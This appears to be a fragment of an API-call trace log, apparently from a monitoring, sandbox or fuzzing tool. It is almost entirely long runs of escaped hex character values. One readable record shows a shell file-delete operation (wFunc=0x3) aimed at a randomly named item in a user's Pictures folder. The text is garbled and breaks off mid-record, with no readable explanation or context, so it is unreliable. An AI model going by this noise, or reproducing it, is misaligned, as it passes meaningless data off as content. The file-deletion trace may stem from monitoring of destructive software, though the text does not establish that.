\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\itO8mb4FwKJbnFD", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70bf\x7bc2\xbc2e\x155f\xbf79\xde18\x8907\xa4d7\xae8a\x26c0\xf212\x66ca\x7e1d\xe19f\x3fdf\xeff0\xf9ef\x69f7\x7dfe\x7f8a\xe49f\xdddf\xbf9c\xd10b\xba35\xaf3d\xd864\xff87\x417\x8cec\x8cd4\x62ff\x703f\x5125\xfb46\x206a\x52fe\x1f8c\xd05d\xb00a\xf9cb\xfab\xba74\x4e82\xd3dc\xd819\x7165\xfdea\xef70\x2b86\xa030\xcedb\x32ce\xf30b\x6848\x13a6\x9acd\x95c1\x48c\xe8ef\xd334\xd83e\xb625\x8390\x273e\xf2ee\x72e3\xb434\xeacb\x24d8\xfde5\xd646\xc1ed\xf682\xa70\xb5f5\x8943\xb78a\xe836\xf76b\x5f52\x9d1b\x9db9\xd416\xa168\x7682\xed33\x908f\xb5d\xeedd\xeb9e\x73a7\xfdd2\x3974\xf320\x77a7\xed44\x4e4e\x75c\x67d3\xd2dd\x8423\x74ab\xa59\xe208\xd07e\xe81f\x2f1\x61be\x46c9\xa214\x6399\x5b80\xe0b\xca4\x8337\x45fc\x9d13\x1db8\x603f\x82b\xebc7\xd6fd\x1cbb\x459e\x55b6\xf5ff\x722c\x6eac\x53f7\x1b85\x8087\x235\xc4ff\x8bca\x9df2\x3a5e\x4525\x7ab3\x85dd\xea5e\x6ecc\xc1f2\x381a\x1fc8\x4c2a\x4521\xbf16\x9b67\x6c9e\x12d6\xdb63\xd500\x54d3\xc72\x4abe\xf79f\x9b53\x849b\x8252\x22fe\xaad\x2306\x2645\xbec1\x6948\xcf7c\x2e6d\xf5a1\x423d\x40b4\x4126\x406f\xbb1\x47a1\xe9c5\xb824\xd5cc\x25d3\x70fa\xdf0a\xe4f8\xd313\xe84c\x1f01\x38fd\x8bbb\x3769\x8ac3\x3b48\x4d2b\xe920\x2ed7\xb242\x8199\x5206\x7baf\x3d2e\x1aa8\xa649\x386a\xe84c\x65ec\xbd1a\xa1c3\x2d15\x7a77\x9343\x29cd\xa8d8\x8d90\xf44e\x39e8\x55b6\xf889\xac70\xa872\xf74\x2974\x11f0\xea4c\xa105\xb009\xcfa\x2328\x69d0\xba12\x3d66\x6b1\xd91c\x717b\xdacb\xdd97\x8a44\x38a6\xd6fd\x6226\x702d\xbda0\xa155\x6d13\xf2b9\x11aa\xa274\x5723\xadb5\xe21e\x5cf5\x22bc\xebcd\xdbb9\x5ab6\x8d51\x331c\x5560\xce83\x5a10\x2c2b\x36e6\x51bf\xc03b\xb073\x6de4\x4a95\xb746\xd209\x2867\x5225\xad87\x588a\x8e7d\x9270\xb86a\xd524\x8118\x9402\x3850\x43ee\x4385\x7b17\xb341\xb4e3\x1e8e\x27f9\x93c2\x1a5c\x302c\x7c85\xf1bf\xf60b\x6719\x705\xa640\xc505\x658b\x4dc\xe112\x295d\x33b4\xa97c\xccd9\xae92\xbbe4\xcf1f\x5a11\xc196\x1e77\xd652\xa293\x4e49\x6d62\x3cf4\x5b68\xf765\xe83c\x9558\xfc00\xec\x14f4\x2386\x3541\xcc9a\xcdb0\xfd4b\xbe36\x77d5\xb900\x74c7\x7312\xc19a\x61f6\x90ab\x9c1f\x2647\x3cb\xe3fc\x5ae\x28dc\xabfa\x702b\x7aad\x8736\xc90b\x59c3\x619\xf4e9\xd41c\x963b\xf069\xdc55\x3200\x5881\xd744\xc967\xb35c\x6943\x4b81\xc80e\x40a5\xe10c\xa05b\xd807\x3f7c\x3a2c\x3c79\xa3ff\x32ee\x77ce\xd5b8\xf71f\x4571\xa105\x197c\x589b\x20d8\x5647\xbc84\x22bb\xa638\x905\xe9e7\xc224\xa7d4\xe773\x7a1c\x98c8\x6db\x9315\x8076\xf631\xcb9f\x9711\xdaca\xb125\x83c2\xa7cc\xad9a\x3cd0\x27ee\x961a\xc100\x5050\xdb9c\xe6db\x824c\xd8fd\x2f5f\x4547\x59f5\xd417\xda5a\xfd97\x430e\xab4\xc043\x9b42\x7048\x838a\x2f05\xa3e7\x92e0\x1de3\xe2c8\xa7f5\x6c93\x2f01\x1aa4\xe893\xb676\xa41f\x3647\x979d\x73c4\xfb85\xeea0\x9832\x39d0\x5c0e\xbf72\xff66\x2a1a\x6bc5\xec11\x9e52\xa76\x85cc\xf9a8\x88d3\xaa8e\x78f0\xed31\x9d42\xf114\x3227\x7c79\x5c56\x8f7c\xfd1d\xe7d\x1f5c\x38a9\x877\x2da0\x69d\xef15\x7c0d\x780d\x9a2d\x5d9f\xee13\xcf8a\xa7f3\xde4c\x48c5\xd845\x1ebf\x3ad8\xcb01\x838a\x24cd\xd7a1\x85dc\x5b20\xf290\x1ba3\x36f8\xfd9a\xd9f6\x8f11\xcaa8\x6d17\x1338\x754f\xb8db\xf544\x11d6\x436e\x6946\x4b2a\x4a71\x938a\x9538\xb27e\xcce2\x2973\xfcfd\x84e\x2966\x54fd\x8417\x20f3\x290c\x2148\xf384\x3c20\xc217\x8a85\x8ab3\x671b\xa9fa\x2173\x780a\xd949\x117a\x562c\x5fa\x1a39\xcb05\x73d7\x43f3\xd432\x2035\x623f\x278c\xb2b4\xab1d\xce0f\xf32c\xfed3\x3518\x1497\x3255\x9b\x42f\x2770\x1236\x8bde\x6231\xf299\xa566\xc764\xd08\x3270\xabe8\xd3f2\x7909\x74a8\x967\x8f6f\xaf90\xf915\xae08\xa4ac\xb7c1\x65de\xf5ff\xd060\x1ba3\xdfb0\xec21\xc92d\xc9de\x615e\x1a38\x71db\xe234\x7cf9\x590f\xe21d\x7ea4\xb71c\xaaa\xb5d9\x7197\x824a\x5f09\x638f\x2ece\xe1e1\x3959\x3a11\x362\x3c05\x4bc7\x9c2d\x6bad\x59b4\x72b3\x403c\xb346\x8b9b\xa8e2\x6037\x34f3\x22a1\x3034\xa279\xaac0\x5908\xa09\xc98a\x2146\xeffb\x7266\xfce1\xc993\x5c\xee7d\x9436\xed71\xb319\x9430\x795a\xd71b\x1f9c\x9113\x4473\xb3e4\xb222\x445c\xe6ee\xf691\x22e5\x2354\x594a\x4229\xcc5f\xa1e4\x22a5\x4e34\x1e84\xa114\x2281\xa2df\xb8db\x6057\xef54\xdbbd\xb081\x1f89\x5249\xeabd\xadc4\x21d\x513\xf6d8\xa91f\x9bb7\x2426\xf8ba\x4923\xb024\xa488\xac2a\xb5db\x3871\x291f\xd4eb\x5287\xe1c4\x9313\xa1b1\xbbd\x482\x3e87\x7b14\x1f48\x514a\x347d\xbf42\x6d11\xbf51\x6d98\x7743\xd5ea\x494e\x8587\x16ef\x2a07\x3311\x7d90\xdbc0\xc724\xceb9\xbd82\x3b6c\x3fcb\xb38c\x3ced\xc52c\x76d9\x1cf6\x8f3b\x76d\x9165\x6719\xbc09\x1e88\x774\x2c7a\xe82e\x2cc2\x4dd\x6e45\x1b8b\x3d9b\x41d1\x5eb8\xba13\xe645\x909e\x6c8d\x8c1a\xfd72\xa744\xb67c\x47a7\x5c74\x1eca\x3742\x438b\x1f7a\xfd42\x660e\x2ee3\x4512\xa90e\xdf3e\x9319\x8db7\xf887\xb5c8\x207e\xdba1\xeaa5\x8ba8\x9e3\xda66\xedc9\xa1a0\x8171\x3ed9\x751\xdf09\x5337\xf668\x9076\x8de3\x63f1\x4a20\x240a\x4f1\x32ec\x6d00\x63ea\x8493\xa119\x2ea3\x6fb2\x3b85\xb8b2\xbb19\x1069\xfa26\xeffc\x375c\xdc4b\x4e84\xbb7d\x346\xe2a\x7f\xbd8a\x536\xe58b\x6d18\x284f\x9446\x2ae1\xd6e\x8c0c\xe9fd\xd007\x62dc\xeaff\x8e01\x7388\xf1b9\x3905\xd079\xf3e\x1aa2\xd7ec\xc43\xdb56\xbf60\xb166\x2950\xec1b\x4437\xaade\xb951\x8b24\x106a\xafe7\x9cc5\x360d\xd2d9\x9e2b\xfea6\x3a69\xac16\x5cd9\x48d1\xcd18\xdfd4\x2344\xe321\xc3ae\x70d0\xca86\xb1ad\xa73d\xfcee\x78fe\x5b20\x4281\x2a6a\x832f\xfce\x2d59\x15bc\xa7b3\xb447\x7a7f\x1e98\xd2f2\xe56d\x2cdf\xe7d6\xe7df\x3ba5\xba54\x2d4f\xbcef\xf177\x7f7c\xd7f9\xe693\xe2f\xe650\xae4d\x4d0b\xbd92\xdbc9\xe554\x6dc9\xf96a\x6a37\x5f40\x96a8\x9f1f\x58bf\xd7bf\x7c97\xfca8\x9178\xe05a\x26f5\xca1f\x9e53\xcfac\x526e\xf65e\x7962\xd08d\x1b0c\x92b0\x1f14\xd408\xd337\xf2d6\x3a4f\x346f\xf295\x3553\xb209\x67a4\x9f96\x9b9a\x9160\x91f4\xa7e5\xf18a\xb439\xdb7c\x9386\x83df\xe5da\xea5a\x9b26\x5db0\x897c\xfe55\xa7b0\x8074\xda97\x2fef\x4191\x6986\xbd94\xfb41\xf03d\x4e1a\xb884\xe15b\xf25\xf644\x6aa1\xc7f9\xd292\xa8a9\x27e5\x6525\xb4ae\x1922\xda12\x6120\xc02e\x51ab\xf067\x15b0\xb023\xf455\xd074\xc6e6\xc6f9\x2946\x3f9b\x53ed\x498a\x902d\x2fb4\xf16\x331\xb4a\xec1b\xb4ea\xe8\xe079\xf0d\x2029\x6868\x58e9\x5c7c\x7a58\x8365\x387d\x5bc4\x8a79\xf0c1\xde86\x79f7\xd5d\x7d2e\x8340\xedd\x3b61\x9887\x6553\x4ae9\x7049\x173b\x124a\x8819\x59ff\x8adc\x4e5\x44ba\x2c9b\x42c8\xd983\x406e\x6d5\x2069\x1f62\x1f45\x7437\xc1be\x5305\xf743\xd4a3\x87b2\x1bb9\x4424\x7310\xd0d4\x716d\x643a\x996f\x8b96\x206b\xa0db\x5013\x6a87\x36ec\xc87d\xdf85\x6823\x98b3\xcc2e\xa034\x5de5\x6b92\xf4bf\x5941\x725a\x9011\x66c8\x7768\x3288\x87e8\xb527\x443f\x43d2\x32aa\x23e9\xf3d5\x6051\xd9fb\x2bd6\xc64\xa22b\x5942\x8fdd\x4fd7\x36c7\x7101\x2b60\x1378\x72b0\x3c36\xb956\x241b\x175b\xac54\xc542\xec74\x900b\x5232\xeefd\xaa9e\xfe77\xd54c\x5bff\x23df\xcf1d\x1a9b\x3bab\xc513\xe86a\xe8fd\x48e2\xdfef\xed4a\xfde9\xe280\xdef8\xfb6f\x26b9\xdd9c\x5e86\xb736\x7a02\xa3b7\xe680\xe9fa\x39ad\x9905\x77df\xb6a9\x505\xb8f4\xbf46\x9680\x9529\x211f\xd12e\x907\x8448\x208d\xb611\xb27a\xe315\xc07e\x7a73\x5886\xea4d\x6d3d\xd0d3\xf651\x682f\xf56c\x769e\xc060\x1df8\x8c04\xa715\x2a41\x78a9\xbc42\xc8a6\x20fa\xa700\x7170\xfc5\xb3c2\x3b75\xe368\xcb35\xae56\xcbd2\x4a57\xa545\xb7f7\x3207\x3188\xe9fe\x51cf\xbe5b\xf808\x843\x58de\x3f46\xd8ce\x72fa\x2eb\xb41\x12d6\xa688\x69da\x30a7\xf131\x7682\xdab2\xf8a9\x313a\xce8f\xd38\x59aa\x9701\x3245\x2220\x6fc3\xcfdd\x1fbd\x7177\xc311\x5b4c\x15b6\xad0a\xd483\x7d66\x58c7\x34d3\x6bb3\x5e3a\xc5e5\x83c\xe28a\xc443\xf99f\x476d\xfb10\x42d1\x4dac\xdbd4\x3d8c\x792b\x5e08\x57b0\xc5a5\x3e5d\x4b9b\x82f7\x2c0\x4c2b\x8f8e\x16d6\x6b58\x5026\x9d6f\x5d0d\x5d17\xe6f8\xb780\x81d2\xde90\x2139\x5bd7\xce7\xc324\xa6b\xa6be\xee8\xacd5\x7af5\x9476\xc234\x6057\x260c\x8641\xe90d\x51f5\x41e1\xa4c0\x27a0\x706a\xf122\x8e62\xc87f\xd605\x20ed\x9b64\xf40d\xf402\xbbf9\x5a1f\xbbca\x7a8b\x82f\x733c\x60\xe517\x69f8\xbc29\xda7f\x7ecb\xed47\x6f13\x8192\x6e33\xb91b\x3d43\xead1\x591d\x4de3\x5ae\x7146\x4435\xda72\x5765\x8bf5\x4498\x7136\x2dd2\x6084\xbd97\x801f\xfa2d\xb168\x3c96\xe7f7\x5ac8\xc892\x12d7\xce31\xd39b\x5980\x21a8\x6162\x43d7\x1370\x1172\x7976\x5a07\x9109\xa76f\x7e3e\x963f\x5a0f\x75f0\xc5d3\x17c6\x80f2\x4b15\x790\x6998\x77ee\xe1b8\x106e\x4e7b\xb858\xb4cc\xdf97\x2186\x646e\xed7f\x6c2b\xbd58\xb37c\xece3\x9927\x707b\x755f\xf280\x7ca6\xadbd\xe05f\x6266\x56d6\xe8d4\x883e\x1c0b\x6ff5\x8b29\xf9fc\x4737\x290c\x7e67\xb211\x1bf5\x2a65\x3492\x1bbe\x96be\xa236\xc209\x1903\x16b7\x5284\xe42c\x2b44\x6477\x5918\xafeb\xd3ac\xa3f7\xce3f\xe050\x8d69\x5d72\x5cec\xa1ca\xc84d\x5912\xc2d0\xec77\xb9f2\x7054\xf423\xfb63\xb87d\xa672\xfbfd\xbe3e\x176\xe457\x4a2e\x72b9\x2140\x414\xe0a6\x704\x6193\xc282\x4276\x84f7\x443f\x8365\xe71d\x1acb\x488\xc8a2\x6c4b\xc05c\x9acf\x2753\x3068\x3c6\xda40\x957f\x12f4\x1ff6\xe2d0\x7d85\x7695\xafd3\x1d41\x693b\xee82\x2ae3\x4200\xe79a\xe2ce\xd3f6\xb26b\xaaf7\x4fd5\xe162\xc869\xb82e\x1d44\x682a\x9215\x4834\x9cd5\xd802\xdcbb\xacc3\x9ab2\xe78b\x8d95\x835c\x21e3\x6058\x50b3\x810\x70ae\x35f\xf962\x58c2\x1022\xcc01\xdbb4\x92de\x9184\x7696\x92b3\x7c3e\x9cf6\x6695\xc520\x6d38\x89ea\x85c0\xd69e\x97a\xd6e8\x4d0f\xb53\xef3d\x2ec6\xa308\xa94c\x4fcb\x6797\xc44\x8033\xc11f\x8845\xe71f\xefae\xea30\x301d\xbfc2\xb004\x111a\xbfe3\xd336\x6f96\xc5c1\x59bd\xd3f8\xd102\x44e3\x3a0c\x8db\x780\x8854\x9dc9\xe7c7\x5b0a\x5bb2\x9c8a\x425b\x351f\x2818\x497\xca94\xda0d\x4dd9\xb56c\x1319\x9034\x40e\x6faa\x53f8\xd504\xf1ed\x3ea8\xa408\x151e\xc3c5\x619b\x3716\x120d\x57a2\x8746\xd1df\xb65b\xd0d\x7e5b\x220d\x78c6\x1e1d\x9061\xad6a\xdd1\xc895\xc856\x1fb1\x6791\x4d87\xf917\xffb4\xf977\x408a\x1bd3\x6cbf\x6432\x1eb5\xc626\x23b8\xa052\xc31f\xd7d\x1c98\x6e07\xee8f\xffa\xb60a\x4729\x727a\xd2c3\x61bb\x4e33\xb9ea\x43fb\xdd5b\x171c\x6586\x7940\x2bf4\xb342\xa171\x6a19\x772c\x7ac8\x681a\x6641\x23da\x9198\x66ee\x7e97\xe38f\x1236\x1af7\xc49d\x15dc\xfd8\x4e99\x51fb\x9c58\xcdd2\x2277\x8f0d\x481c\xd330\xd96e\x452c\xb4d2\x3e04\xef3d\x5236\xbe54\xe15b\x8a76\xfa5\x647b\x9f8c\x8259\xeec2\x7660\xb019\x4d9b\xe117\x3cac\x6f89\xc9b8\x7ec7\x9fb\x6e54\xac3d\xc685\x4196\x7e95\xdc63\x9247\xc89e\x2927\xe77c\x3c26\xc93a\xba32\x3485\xee8f\xcc11\x8493\x922\x2e9e\x2504\xfc7c\x24a6\xb04c\xce5\x8cf7\xe168\x399\x17\x6c3a\x117e\x3b8\xa133\x7f14\xdc70\xe147\xe604\xcd3d\xa493\xe5be\xddc7\x741a\xac5\x173f\xc1e9\x210a\x47f9\xcfd6\x2ade\x7645\xc17\x2305\xe20\x72ac\xc0e3\xdc05\xa8a4\xf81e\x1fc4\xca17\x4db8\x689\x132d\x29c2\x783b\x2485\xcc98\xdca8\x4633\x7abb\xb74\xfe60\xba3d\x514b\x6813\x4f0d\x9c10\x26e5\xcd98\x9846\x6fc3\xc5ab\xba1c\x896e\xc7ec\x6998\x31c7\x6e8a\x8ee9\x6498\xb90a\xd4d4\xa662\x5e3d\xb82d\x18fb\x7fc4\xd374\x388e\xcdb5\xc646\x8595\x736f\xda35\x8188\xec8c\xa426\x2c2f\x4cd6\x4bfb\xcf75\x8b59\xc8bc\xf8fe\x9eac\xcda\xfe0e\xd617\x6d96\x7d62\x7973\x807d\x1725\xea47\xedcb\x6fa9\xd62e\x30b2\x5f56\x7c71\xf57d\xfa91\x87ae\x666c\x6183\x565a\x83fc\x18d7\xb5f1\xf6a4\x2b7b\xfb90\x7fd9\x939\x6d44\x522b\x39b7\xa6ea\xbe6a\x485f\x33ed\xec05\x38a6\xe4d8\x4c28\xb015\x7131\x8bb0\xb0a2\x42b\x606c\x2c1c\x3aa9\x33e2\xc208\x3dad\xc04d\x26bb\x3c02\x4851\xedac\xda66\x8dc6\x1b3d\x1928\x9b51\xb50d\xf8e7\x5051\xacac\xe879\xc82a\x7f9\x89c8\x3946\x5dc8\xb98d\x71fb\x6d9\xbc96\xa356\xe1fb\xbe50\x5bac\x5d68\x6ed0\xf3f7\xa45d\xea17\x1aa2\xf473\x651c\xe1ea\xb8dd\xf393\x46d4\x31be\xe5f6\x1eee\x93d7\xbedf\xa3c9\x3cc2\x19aa\xbf8a\x2275\xd2d7\x1b26\xa188\x42b\xf4\xb342\x37ed\xe44c\xff7b\xbd00\x4386\x14ef\x6d0\x7501\xa0c5\x7117\x9e68\x6e80\x5012\xc4b\xe0ea\x11d0\xba02\x4045\xe3ff\x428b\x5ebf\x5083\x809b\x2ebe\xf5a0\xe831\x1c07\xd9fa\x39bf\xfff4\xf404\x18d5\x9eb4\x1b43\xf405\x125\x175d\x6e83\xd0e0\x8bf\x73e8\x7a02\xc5f\x5bfa\x7d0e\x4054\x129f\x9bd0\xd062\xe0a\x2c5d\xcfa0\x6808\xc56\x98ba\xb43\xf405\x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b